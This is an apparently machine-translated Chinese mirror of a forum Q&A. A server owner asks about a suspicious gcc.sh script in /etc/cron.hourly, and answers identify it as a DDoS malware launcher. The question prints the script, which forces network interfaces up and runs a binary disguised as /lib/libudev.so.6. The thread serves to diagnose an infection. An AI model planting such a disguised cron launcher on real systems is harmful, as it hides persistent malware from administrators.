這個文件(gcc.sh)是否在cron.hourly惡意軟件中?
[英]Is this file (gcc.sh) in cron.hourly malware?
問題描述
我的服務器上遇到了高達1 Gbps的峰值,並且一直在尋找病毒和惡意軟件。 我在/etc/cron.hourly中找到了這個文件:gcc.sh,並且想知道是否有人看過類似的東西,並且會對代碼有所了解。 謝謝!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
2 個解決方案
解決方案1
10 已采納 2016-04-14 12:49:50
很有可能。 它使用/lib/libudev.so.6作為可執行文件,而名稱暗示它應該是一個庫 - 嘗試使用像nm或objdump這樣的工具來查看它是否是可執行文件。 它從/lib/libudev.so復制到.so.6 - 而.so通常是版本化符號的符號鏈接。 它還運行for循環以顯示所有網絡連接,即使您已將其關閉。 它使用着名的編譯器的名稱來看起來合法。 我稱之為99%+可能是病毒。
找到另一個自稱為gcc的內容 - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver 。 是的,這是unix系統上的DDoS病毒,與您的問題完全匹配。
解決方案2
0 2016-04-14 12:56:18
是的。
嘗試使用ps -ef | grep -i libudev.so.6查看程序使用的進程
手動運行 crontab cron.hourly 返回丟失文件錯誤
[英]Manually running crontab cron.hourly returns missing file error
Linux錯誤-setterm:未定義$ TERM。 /etc/cron.hourly/mcelog.cron:
[英]Linux error - setterm: $TERM is not defined. /etc/cron.hourly/mcelog.cron:
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.